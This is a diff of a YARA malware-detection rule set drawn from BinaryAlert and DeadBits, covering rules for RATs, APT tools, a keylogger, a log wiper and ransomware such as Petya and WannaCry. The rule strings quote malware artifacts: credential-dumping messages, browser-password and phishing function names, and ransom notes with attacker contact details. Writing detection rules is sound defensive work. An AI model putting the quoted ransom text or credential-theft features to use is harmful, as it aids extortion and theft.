"https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_1.yara#L1-L22" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "abb2093844af1b854a9deed5baab3f4d67bd1189a4520f697aa69b7441d9488c" + hash = "b099b82acb860d9a9a571515024b35f0" + logic_hash = "f6706c66a378b80d3cedf118a812d8add60e12b44402a30d941d08ff30c7ab1c" score = 75 quality = 80 tags = "" - md5_1 = "19fbd8cbfb12482e8020a887d6427315" - md5_2 = "ea06b213d5924de65407e8931b1e4326" - md5_3 = "14ecd5e6fc8e501037b54ca263896a11" - md5_4 = "e079ec947d3d4dacb21e993b760a65dc" - md5_5 = "edf900cebb70c6d1fcab0234062bfc28" strings: - $modulus = {DA E1 01 CD D8 C9 70 AF C2 E4 F2 7A 41 8B 43 39 52 9B 4B 4D E5 85 F8 49} + $a1 = "### PE STORAGE ###" wide ascii + $a2 = "### CRYPTO 0 ###" wide ascii + $a3 = "### EXTERNAL STORAGE ###" wide ascii + $a4 = "### CRYPTO 1 ###" wide ascii + $a5 = "### QUEUES ###" wide ascii + $a6 = "### TRANSPORT ###" wide ascii + $a7 = "### EXECUTION SUBSYSTEM ###" wide ascii + $a8 = "### AUTORUN MANAGER ###" wide ascii + $a9 = "### INJECT MANAGER ###" wide ascii + $a10 = "### LOCAL TRANSPORT MANAGER ###" wide ascii condition: - $modulus + 6 of ($a*) } -rule BINARYALERT_Malware_Windows_Moonlightmaze_Custom_Sniffer +rule BINARYALERT_Malware_Windows_Xrat_Quasarrat { meta: - description = "Rule to detect Moonlight Maze sniffer tools" - author = "Kaspersky Lab" - id = "a9f005e0-8d73-58ff-b010-d3ce08ffdb64" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_custom_sniffer.yara#L1-L20" + description = "xRAT is a derivative of QuasarRAT; this catches both RATs." + author = "@mimeframe" + id = "f4db2402-3653-5525-a137-de2de29cef28" + date = "2017-09-12" + modified = "2017-09-12" + reference = "https://github.com/quasar/QuasarRAT" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_xrat_quasarrat.yara#L1-L31" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "466be027f567fe0afc88c82d94e4e0171b4b7d8f38d27a4c4a18cec4ca2b8b2f" + logic_hash = "92533157a62ccae5d1bdc9d0bb7511817422c6b5d75d013a15173cd1121d099e" score = 75 - quality = 80 + quality = 30 tags = "" - md5_1 = "7b86f40e861705d59f5206c482e1f2a5" - md5_2 = "927426b558888ad680829bd34b0ad0e7" strings: - $a1 = "/var/tmp/gogo" fullword - $a2 = "myfilename= |%s|" fullword - $a3 = "mypid,mygid=" fullword - $a4 = "mypid=|%d| mygid=|%d|" fullword - $a5 = "/var/tmp/task" fullword - $a6 = "mydevname= |%s|" fullword + $a1 = ">> New Session created" wide ascii + $a2 = ">> Session unexpectedly closed" wide ascii + $a3 = ">> Session closed" wide ascii + $a4 = "session unexpectedly closed" wide ascii + $a5 = "cmd" fullword wide ascii + $a6 = "/K" fullword wide ascii + $b1 = "echo DONT CLOSE THIS WINDOW!" wide ascii + $b2 = "ping -n 20 localhost > nul" wide ascii + $b3 = "Downloading file..." wide ascii + $b4 = "Visited Website" wide ascii + $b5 = "Adding Autostart Item failed!" wide ascii + $b6 = ":Zone.Identifier" wide ascii + $c1 = "GetDrives I/O error" wide ascii + $c2 = "/r /t 0" wide ascii + $c3 = "desktop.ini" wide ascii + $c4 = "WAN IP Address" wide ascii + $c5 = "User refused the elevation request." wide ascii + $c6 = "Process already elevated." wide ascii condition: - any of ($a*) + 5 of ($a*) or 5 of ($b*) or 5 of ($c*) } -rule BINARYALERT_Malware_Multi_Pupy_Rat +rule BINARYALERT_Malware_Windows_Apt_Red_Leaves_Generic { meta: - description = "pupy - opensource cross platform rat and post-exploitation tool" - author = "@mimeframe" - id = "b26deb19-85b2-5d39-9ff2-0ab9017f3263" + description = "Red Leaves malware, related to APT10" + author = "David Cannings" + id = "e0067b05-eb4a-52ec-8f35-9336a631f03b" date = "2017-09-12" modified = "2017-09-12" - reference = "https://github.com/n1nj4sec/pupy" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/multi/malware_multi_pupy_rat.yara#L1-L16" + reference = "https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Red%20Leaves/Source/Red%20Leaves%20technical%20note%20v1.0.md" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_red_leaves_generic.yara#L1-L27" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "bb5d1e7f2aea94dc41efe75690ae31409e8f6305aa6c4ec0cd46922ee8fb7241" + hash = "81df89d6fa0b26cadd4e50ef5350f341" + logic_hash = "be03bba9d01e6584b5849514656fd7de866c478f343c0bc618d7dbeda1771696" score = 75 - quality = 74 + quality = 80 tags = "" strings: - $a1 = "dumping lsa secrets" nocase wide ascii - $a2 = "dumping cached domain passwords" nocase wide ascii - $a3 = "the keylogger is already started" nocase wide ascii - $a4 = "pupyutils.dns" wide ascii - $a5 = "pupwinutils.security" wide ascii - $a6 = "-PUPY_CONFIG_COMES_HERE-" wide ascii + $a1 = "Feb 04 2015" + $a2 = "I can not start %s" + $a3 = "dwConnectPort" fullword + $a4 = "dwRemoteLanPort" fullword + $a5 = "strRemoteLanAddress" fullword + $a6 = "strLocalConnectIp" fullword + $a7 = "\\\\.\\pipe\\NamePipe_MoreWindows" wide + $a8 = "RedLeavesCMDSimulatorMutex" wide + $a9 = "(NT %d.%d Build %d)" wide + $a10 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)" wide + $a11 = "red_autumnal_leaves_dllmain.dll" wide ascii + $a12 = "__data" wide + $a13 = "__serial" wide + $a14 = "__upt" wide + $a15 = "__msgid" wide condition: - 3 of ($a*) + 7 of ($a*) } -rule BINARYALERT_Malware_Multi_Vesche_Basicrat +import "pe" + +rule BINARYALERT_Malware_Windows_Moonlightmaze_Wipe : FILE { meta: - description = "cross-platform Python 2.x Remote Access Trojan (RAT)" - author = "@mimeframe" - id = "e07a684c-3a3d-5dd3-a540-2cc9a5a170dd" - date = "2017-09-12" - modified = "2017-09-12" - reference = "https://github.com/vesche/basicRAT" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/multi/malware_multi_vesche_basicrat.yara#L1-L15" + description = "Rule to detect log cleaner based on wipe.c" + author = "Kaspersky Lab" + id = "35060c3d-b805-54a6-a241-eb6e99168fa8" + date = "2017-08-11" + modified = "2017-08-11" + reference = "http://www.afn.org/~afn28925/wipe.c" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_wipe.yara#L3-L18" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "1503ce9de4e721903058c77b305ba057052d654ff1875ea880f4319c3e525a29" + hash = "e69efc504934551c6a77b525d5343241" + logic_hash = "0241d1ca9f5a4d066f7ed2e80bc18ebae3723c6a2364422e31909e8f0e576675" + score = 75 + quality = 80 + tags = "FILE" + + strings: + $a1 = "ERROR: Unlinking tmp WTMP file." + $a2 = "USAGE: wipe [ u|w|l|a ] ...options..." + $a3 = "Erase acct entries on tty : wipe a [username] [tty]" + $a4 = "Alter lastlog entry : wipe l [username] [tty] [time] [host]" + + condition: + ( uint32(0)==0x464c457f) and (2 of them ) +} +rule BINARYALERT_Malware_Windows_Moonlightmaze_Loki +{ + meta: + description = "Rule to detect Moonlight Maze Loki samples by custom attacker-authored strings" + author = "Kaspersky Lab" + id = "06eeb6a4-540f-51eb-86f9-4ab49543f645" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_loki.yara#L1-L27" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "9a403695ded6ff3626820ba0d4abde7ccd6f3fa6bfd8aa4ceaf0cc009d34c97f" score = 75 quality = 80 tags = "" + md5_1 = "14cce7e641d308c3a177a8abb5457019" + md5_2 = "a3164d2bbc45fb1eef5fde7eb8b245ea" + md5_3 = "dabee9a7ea0ddaf900ef1e3e166ffe8a" + md5_4 = "1980958afffb6a9d5a6c73fc1e2795c2" + md5_5 = "e59f92aadb6505f29a9f368ab803082e" strings: - $a1 = "HKCU Run registry key applied" wide ascii - $a2 = "HKCU Run registry key failed" wide ascii - $a3 = "Error, platform unsupported." wide ascii - $a4 = "Persistence successful," wide ascii - $a5 = "Persistence unsuccessful," wide ascii + $a1 = "Write file Ok..." ascii wide + $a2 = "ERROR: Can not open socket...." ascii wide + $a3 = "Error in parametrs:" ascii wide + $a4 = "Usage: @ " ascii wide + $a5 = "ERROR: Not connect..." ascii wide + $a6 = "Connect successful...." ascii wide + $a7 = "clnt <%d> rqstd n ll kll" ascii wide + $a8 = "clnt <%d> rqstd swap" ascii wide + $a9 = "cld nt sgnl prcs grp" ascii wide + $a10 = "cld nt sgnl prnt" ascii wide + $a11 = "ork error" ascii fullword condition: - all of ($a*) + 2 of ($a*) +} +rule BINARYALERT_Malware_Windows_Moonlightmaze_Xk_Keylogger +{ + meta: + description = "Rule to detect Moonlight Maze 'xk' keylogger" + author = "Kaspersky Lab" + id = "5623021d-0d70-59b3-ae30-522e81552da0" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_xk_keylogger.yara#L1-L22" + license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" + logic_hash = "430027b41aeda9a11dadec2e4d3dd2474852ff3a7656ed7128711a1574e66b8f" + score = 75 + quality = 30 + tags = "" + + strings: + $a1 = "Log ended at => %s" + $a2 = "Log started at => %s [pid %d]" + $a3 = "/var/tmp/task" fullword + $a4 = "/var/tmp/taskhost" fullword + $a5 = "my hostname: %s" + $a6 = "/var/tmp/tasklog" + $a7 = "/var/tmp/.Xtmp01" fullword + $a8 = "myfilename=-%s-" + $a9 = "/var/tmp/taskpid" + $a10 = "mypid=-%d-" fullword + $a11 = "/var/tmp/taskgid" fullword + $a12 = "mygid=-%d-" fullword + + condition: + 3 of ($a*) } rule BINARYALERT_Malware_Macos_Apt_Sofacy_Xagent { @@ -116894,61 +119109,33 @@ rule BINARYALERT_Malware_Macos_Apt_Sofacy_Xagent condition: BINARYALERT_Macho_PRIVATE and (5 of ($a*) or any of ($b*) or any of ($c*) or 4 of ($d*) or 5 of ($e*)) } -rule BINARYALERT_Malware_Macos_Marten4N6_Evilosx -{ - meta: - description = "EvilOSX is a pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX." - author = "@mimeframe" - id = "2b2e62ca-f95c-55c5-aaf6-985aab49dfbb" - date = "2017-09-12" - modified = "2017-09-12" - reference = "https://github.com/Marten4n6/EvilOSX" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_marten4n6_evilosx.yara#L1-L16" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "3402ebf34fd507d0c317416bf77bb3d51b67c8b0f099ce68d15ade6a6a2e302a" - score = 75 - quality = 80 - tags = "" - - strings: - $a1 = "icloud_phish_stop" fullword wide ascii - $a2 = "icloud_contacts" fullword wide ascii - $a3 = "itunes_backups" fullword wide ascii - $a4 = "chrome_passwords" fullword wide ascii - $a5 = "Starting EvilOSX..." wide ascii +import "pe" - condition: - 4 of ($a*) -} -rule BINARYALERT_Malware_Macos_Bella +rule BINARYALERT_Malware_Macos_Macspy : FILE { meta: - description = "Bella is a pure python post-exploitation data mining tool & remote administration tool for macOS." - author = "@mimeframe" - id = "ca4ab508-8c97-5307-9aaf-db10cfd6ab35" - date = "2017-09-12" - modified = "2017-09-12" - reference = "https://github.com/Trietptm-on-Security/Bella" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_bella.yara#L1-L22" + description = "macSpy is a malware-as-a-service (MaaS) product advertised as the most sophisticated Mac spyware ever" + author = "AlienVault Labs" + id = "5f9a5ed5-a982-552c-a6df-326228eaf459" + date = "2017-08-11" + modified = "2017-08-11" + reference = "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_macspy.yara#L3-L17" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "b9c063b5ec8604958d3417ec8640da4314ebcf60ee55413a2f6fa8d138311614" + hash = "6c03e4a9bcb9afaedb7451a33c214ae4" + logic_hash = "f04648860c9602e43516113000908008847dacfbe189d79e13737bcd034b68a0" score = 75 quality = 80 - tags = "" + tags = "FILE" strings: - $a1 = "Verified! [2FV Enabled] Account ->" wide ascii - $a2 = "There is no root shell to perform this command. See [rooter] manual entry." wide ascii - $a3 = "Attempt to escalate Bella to root through a variety of attack vectors." wide ascii - $a4 = "BELLA IS NOW RUNNING. CONNECT TO BELLA FROM THE CONTROL CENTER." wide ascii - $b1 = "user_pass_phish" fullword wide ascii - $b2 = "bella_info" fullword wide ascii - $b3 = "get_root" fullword wide ascii - $c1 = "Please specify a bella server." wide ascii - $c2 = "What port should Bella connect on [Default is 4545]:" wide ascii + $header0 = {cf fa ed fe} + $header1 = {ce fa ed fe} + $header2 = {ca fe ba be} + $c1 = { 76 31 09 00 76 32 09 00 76 33 09 00 69 31 09 00 69 32 09 00 69 33 09 00 69 34 09 00 66 31 09 00 66 32 09 00 66 33 09 00 66 34 09 00 74 63 3A 00 } condition: - any of ($a*) or all of ($b*) or all of ($c*) + ($header0 at 0 or $header1 at 0 or $header2 at 0) and $c1 } rule BINARYALERT_Malware_Macos_Proton_Rat_Generic { @@ -116978,33 +119165,31 @@ rule BINARYALERT_Malware_Macos_Proton_Rat_Generic condition: BINARYALERT_Macho_PRIVATE and any of ($a*) and any of ($b*) } -import "pe" - -rule BINARYALERT_Malware_Macos_Macspy : FILE +rule BINARYALERT_Malware_Macos_Marten4N6_Evilosx { meta: - description = "macSpy is a malware-as-a-service (MaaS) product advertised as the most sophisticated Mac spyware ever" - author = "AlienVault Labs" - id = "5f9a5ed5-a982-552c-a6df-326228eaf459" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_macspy.yara#L3-L17" + description = "EvilOSX is a pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX." + author = "@mimeframe" + id = "2b2e62ca-f95c-55c5-aaf6-985aab49dfbb" + date = "2017-09-12" + modified = "2017-09-12" + reference = "https://github.com/Marten4n6/EvilOSX" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_marten4n6_evilosx.yara#L1-L16" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "6c03e4a9bcb9afaedb7451a33c214ae4" - logic_hash = "f04648860c9602e43516113000908008847dacfbe189d79e13737bcd034b68a0" + logic_hash = "3402ebf34fd507d0c317416bf77bb3d51b67c8b0f099ce68d15ade6a6a2e302a" score = 75 quality = 80 - tags = "FILE" + tags = "" strings: - $header0 = {cf fa ed fe} - $header1 = {ce fa ed fe} - $header2 = {ca fe ba be} - $c1 = { 76 31 09 00 76 32 09 00 76 33 09 00 69 31 09 00 69 32 09 00 69 33 09 00 69 34 09 00 66 31 09 00 66 32 09 00 66 33 09 00 66 34 09 00 74 63 3A 00 } + $a1 = "icloud_phish_stop" fullword wide ascii + $a2 = "icloud_contacts" fullword wide ascii + $a3 = "itunes_backups" fullword wide ascii + $a4 = "chrome_passwords" fullword wide ascii + $a5 = "Starting EvilOSX..." wide ascii condition: - ($header0 at 0 or $header1 at 0 or $header2 at 0) and $c1 + 4 of ($a*) } rule BINARYALERT_Malware_Macos_Neoneggplant_Eggshell { @@ -117038,367 +119223,164 @@ rule BINARYALERT_Malware_Macos_Neoneggplant_Eggshell condition: all of ($a*) or 3 of ($b*) or 3 of ($c*) } -rule BINARYALERT_Ransomware_Windows_Petya_Variant_1 -{ - meta: - description = "Petya Ransomware new variant June 2017 using ETERNALBLUE" - author = "@fusionrace" - id = "bf56c0e4-585c-509b-a182-a93c74be7524" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_1.yara#L1-L18" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "71b6a493388e7d0b40c83ce903bc6b04" - logic_hash = "3733834ee2271a483739b09c4222d222aa4899cab48fd8fc558bdbd9a66bf2d6" - score = 75 - quality = 80 - tags = "" - - strings: - $s1 = "Ooops, your important files are encrypted." fullword ascii wide - $s2 = "Send your Bitcoin wallet ID and personal installation key to e-mail" fullword ascii wide - $s3 = "wowsmith123456@posteo.net. Your personal installation key:" fullword ascii wide - $s4 = "Send $300 worth of Bitcoin to following address:" fullword ascii wide - $s5 = "have been encrypted. Perhaps you are busy looking for a way to recover your" fullword ascii wide - $s6 = "need to do is submit the payment and purchase the decryption key." fullword ascii wide - - condition: - any of them -} -rule BINARYALERT_Ransomware_Windows_Cryptolocker -{ - meta: - description = "The CryptoLocker malware propagated via infected email attachments, and via an existing botnet; when activated, the malware encrypts files stored on local and mounted network drives" - author = "@fusionrace" - id = "be205f4b-d078-5437-bacc-203c816db2fa" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://www.secureworks.com/research/cryptolocker-ransomware" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_cryptolocker.yara#L1-L21" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "012d9088558072bc3103ab5da39ddd54" - logic_hash = "317cbc01b4c329befeb5b25478f7827298a26d21b872ae232c519febd9c547fc" - score = 75 - quality = 80 - tags = "" - - strings: - $u0 = "Paysafecard is an electronic payment method for predominantly online shopping" fullword ascii wide - $u1 = "bb to select the method of payment and the currency." fullword ascii wide - $u2 = "Where can I purchase a MoneyPak?" fullword ascii wide - $u3 = "Ukash is electronic cash and e-commerce brand." fullword ascii wide - $u4 = "You have to send below specified amount to Bitcoin address" fullword ascii wide - $u5 = "cashU is a prepaid online" fullword ascii wide - $u6 = "Your important files \\b encryption" fullword ascii wide - $u7 = "Encryption was produced using a \\b unique\\b0 public key" fullword ascii wide - $u8 = "then be used to pay online, or loaded on to a prepaid card or eWallet." fullword ascii wide - $u9 = "Arabic online gamers and e-commerce buyers." fullword ascii wide - - condition: - 2 of them -} -rule BINARYALERT_Ransomware_Windows_Hddcryptora -{ - meta: - description = "The HDDCryptor ransomware encrypts local harddisks as well as resources in network shares via Server Message Block (SMB)" - author = "@fusionrace" - id = "56d7f1f5-811d-58c9-9e1d-d2f48c01e167" - date = "2017-08-11" - modified = "2017-08-11" - reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_HDDCryptorA.yara#L1-L23" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "498bdcfb93d13fecaf92e96f77063abf" - logic_hash = "24c113be31c3df7b544a5789bf055f77471d450c07f0a6729a715e2a82b4d1f0" - score = 75 - quality = 78 - tags = "" - - strings: - $u1 = "You are Hacked" fullword ascii wide - $u2 = "Your H.D.D Encrypted , Contact Us For Decryption Key" nocase ascii wide - $u3 = "start hard drive encryption..." ascii wide - $u4 = "Your hard drive is securely encrypted" ascii wide - $g1 = "Wipe All Passwords?" ascii wide - $g2 = "SYSTEM\\CurrentControlSet\\Services\\dcrypt\\config" ascii wide - $g3 = "DiskCryptor" ascii wide - $g4 = "dcinst.exe" fullword ascii wide - $g5 = "dcrypt.exe" fullword ascii wide - $g6 = "you can only use AES to encrypt the boot partition!" ascii wide - - condition: - 2 of ($u*) or 4 of ($g*) -} -rule BINARYALERT_Ransomware_Windows_Petya_Variant_Bitcoin +rule BINARYALERT_Malware_Macos_Bella { meta: - description = "Petya Ransomware new variant June 2017 using ETERNALBLUE: Bitcoin" - author = "@fusionrace" - id = "82d6ecc5-7c90-5d50-90ff-f54f8d87685d" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_bitcoin.yara#L1-L13" + description = "Bella is a pure python post-exploitation data mining tool & remote administration tool for macOS." + author = "@mimeframe" + id = "ca4ab508-8c97-5307-9aaf-db10cfd6ab35" + date = "2017-09-12" + modified = "2017-09-12" + reference = "https://github.com/Trietptm-on-Security/Bella" + source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_bella.yara#L1-L22" license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "71b6a493388e7d0b40c83ce903bc6b04" - logic_hash = "9a5e183aa8e1387e76d5df4e967943b730ba780b6758af3ef23e21bb9e4ce3a6" + logic_hash = "b9c063b5ec8604958d3417ec8640da4314ebcf60ee55413a2f6fa8d138311614" score = 75 quality = 80 tags = "" strings: - $s1 = "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB" fullword wide - - condition: - $s1 -} -rule BINARYALERT_Ransomware_Windows_Powerware_Locky -{ - meta: - description = "PowerWare Ransomware" - author = "@fusionrace" - id = "8a1a56af-7a9d-54ed-90b9-daf33735ee1e" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://researchcenter.paloaltonetworks.com/2016/07/unit42-powerware-ransomware-spoofing-locky-malware-family/" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_powerware_locky.yara#L1-L17" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "3433a4da9d8794709630eb06afd2b8c1" - logic_hash = "64de34755f706a9fd4c876c473eed4f8922a4450c7ef135b0ab5e49c67363baf" - score = 75 - quality = 78 - tags = "" - - strings: - $s0 = "ScriptRunner.dll" fullword ascii wide - $s1 = "ScriptRunner.pdb" fullword ascii wide - $s2 = "fixed.ps1" fullword ascii wide + $a1 = "Verified! [2FV Enabled] Account ->" wide ascii + $a2 = "There is no root shell to perform this command. See [rooter] manual entry." wide ascii + $a3 = "Attempt to escalate Bella to root through a variety of attack vectors." wide ascii + $a4 = "BELLA IS NOW RUNNING. CONNECT TO BELLA FROM THE CONTROL CENTER." wide ascii + $b1 = "user_pass_phish" fullword wide ascii + $b2 = "bella_info" fullword wide ascii + $b3 = "get_root" fullword wide ascii + $c1 = "Please specify a bella server." wide ascii + $c2 = "What port should Bella connect on [Default is 4545]:" wide ascii condition: - all of them + any of ($a*) or all of ($b*) or all of ($c*) } -import "pe" - -rule BINARYALERT_Ransomware_Windows_Lazarus_Wannacry : FILE +/* + * YARA Rule Set + * Repository Name: DeadBits + * Repository: https://github.com/deadbits/yara-rules/ + * Retrieval Date: 2024-09-29 + * Git Commit: d002f7ecee23e09142a3ac3e79c84f71dda3f001 + * Number of Rules: 19 + * Skipped: 0 (age), 4 (quality), 0 (score), 0 (importance) + * + * + * LICENSE + * + * NO LICENSE SET + */ +rule DEADBITS_Silenttrinity_Delivery_Document : FILE { meta: - description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta" - author = "Costin G. Raiu, Kaspersky Lab" - id = "6335bd03-0625-5856-891c-9a5decd7e00f" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://twitter.com/neelmehta/status/864164081116225536" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_lazarus_wannacry.yara#L3-L32" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - logic_hash = "dddff5f74bf3f11baf1d3853d6cb5e5b1e0c5e75445c421d4d5145f7a496fc4b" + description = "No description has been set in the source file - DeadBits" + author = "Adam Swanda" + id = "be8cf8b7-d7f8-587d-b7bd-ad10796cda7c" + date = "2019-07-19" + modified = "2019-07-19" + reference = "https://countercept.com/blog/hunting-for-silenttrinity/" + source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/SilentTrinity_Delivery.yara#L1-L30" + license_url = "N/A" + logic_hash = "1efaa317dd250fa127b134ff8e6e6ac48d1056059256f790925d2315a6865033" score = 75 quality = 80 tags = "FILE" - md5_1 = "9c7c7149387a1c79679a87dd1ba755bc" - md5_2 = "ac21c8ad899727137c4b94458d7aa8d8" - - strings: - $a1 = { - 51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75 - 04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01 - 46 56 E8 - } - $a2 = { - 03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00 - 10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00 - 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 - 38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00 - 44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00 - 68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00 - FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0 - 08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0 - 10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0 - 2B C0 2C C0 FF FE - } - - condition: - (( uint16(0)==0x5A4D)) and all of them -} -rule BINARYALERT_Ransomware_Windows_Wannacry -{ - meta: - description = "wannacry ransomware for windows" - author = "@fusionrace" - id = "0269b6f4-a47d-5683-aaaa-2141ca7f04dc" - date = "2017-08-11" - modified = "2017-08-11" - reference = "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/" - source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_wannacry.yara#L1-L23" - license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE" - hash = "4fef5e34143e646dbf9907c4374276f5" - logic_hash = "c01f460c0f5e39cde5f553c966553fe693e5203cb020b8f571eac6fc193fa91b" 